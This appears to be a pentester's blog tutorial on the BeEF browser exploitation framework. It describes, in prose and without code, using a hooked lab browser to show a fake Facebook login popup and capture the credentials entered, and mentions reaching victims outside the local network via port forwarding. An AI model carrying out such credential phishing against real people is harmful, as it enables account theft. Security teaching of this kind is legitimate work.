BeEF for Pentesters:-

BeEF

The word beef has quite a different meaning for pentesters than regular people.For regular people it’s a delicacy but for most pentester’s ,it’s one of the most common tools used in a pentesting environment.So what is this BeEF?

BeEF stands for browser exploitation framework.As the name suggests it is a tool which is exploited by hooking to the victims browser.This dangerous but cool tool comes pre-installed with Kali linux.It’s mostly used to test client side attacks using the web browser.So let us see what BeEF is about.

As I am mostly going to talk about the tool ,so I won’t discuss how to hook a browser with it.There are innumerable methods using which you can hook your victim’s browser like man-in-the-middle attack,phishing but that discussion is for perhaps another day.So I am assuming you have hooked your victim .So once you feel the hook url has been injected into the victim’s browser (hook url is the javascript code if injected makes your victims browser connect back to you) ,this is what’s presented you after obviously logging into the beef service.

Once someone is hooked,it comes under online browsers.

So basically if you navigate to that url above in your Kali,you will have to login into BeEF and after logging into it successfully ,this gui is presented to you.As I said ,I have already hooked a browser which is under online browsers as the user is currently using it.We can see the IP of the machine is 10.0.2.4.You can also see that it’s a windows machine and also a virtual machine(this was actually done in my pentesting lab and hence a virtual machine).Once the user goes offline i.e. the user closes the browser ,it’ll go under offline browsers which acts like a history of previously hooked browsers.

Now when we hook a browser ,the first thing to do is always see the information gathered.So once we press the browser ip,we get presented this.Apologies in this picture though because my victim is listed as offline that is because I took this snap after my victim was offline.

We can display all the info about the browser we hooked .

As you can see ,we actually can view some things about the browser we hooked.Obviously we can display more information by scrolling up and down.
Now let us move to the commands to perform some attacks .So fire up the commands section.There will be many sections displayed.For this article I have especially demonstrated a social engineering attack .There will be a section under commands written as social engineering .Click that and you should see this.

Options when performing a simple phishing attack with BeEF.

I selected the petty theft option and the tool read me a description of the attack.As you can see ,the attack is very self explanatory:A alert dialog box of facebook will appear to tell the user that he/she has been logged out of facebook telling them to login with credentials and then we shall capture the data.Let us see what happens when we execute it:

A fake popup facebook login page is displayed on executing.

As you can see we delivered exactly as promise.The perfect victim would obviously be a person who was browsing facebook and had navigated to another tab.But remember this is a social engineering attack which means it really depends more on the situation and set up.So the victim would login his credentials and press login.Let us see what BeEF captured for us.

Login credentials were captured by BeEF.

And voila! those were the exact credentials I entered username:arnav and password:arnav.You can see them beside the data section.And that is how easy it is to perform a client side attack using BeEF.

Now few things should be kept in mind.First was although I performed this attack from a local network but with port forwarding ,this attack can also be performed outside a local network.I mean think about it, anyone can use BeEF and hook your browser from anywhere in the world !

Now for the prevention of this,the obvious thing to do is just never ever browse http pages or open suspicious urls.Also an add on is available known as https everywhere which prevents the attacker from performing a sslstrip attack so that your web server isn’t brought down to https even explicitly.
So this was about BeEF.And as a reminder,please do not use it without written permission from the user.Be ethical:)

Cats, pizza and cyber security are all I live for! Follow me for a wide variety of topics in the field of cyber security. OSCP ,CRTE , CRTP ,CKAD holder.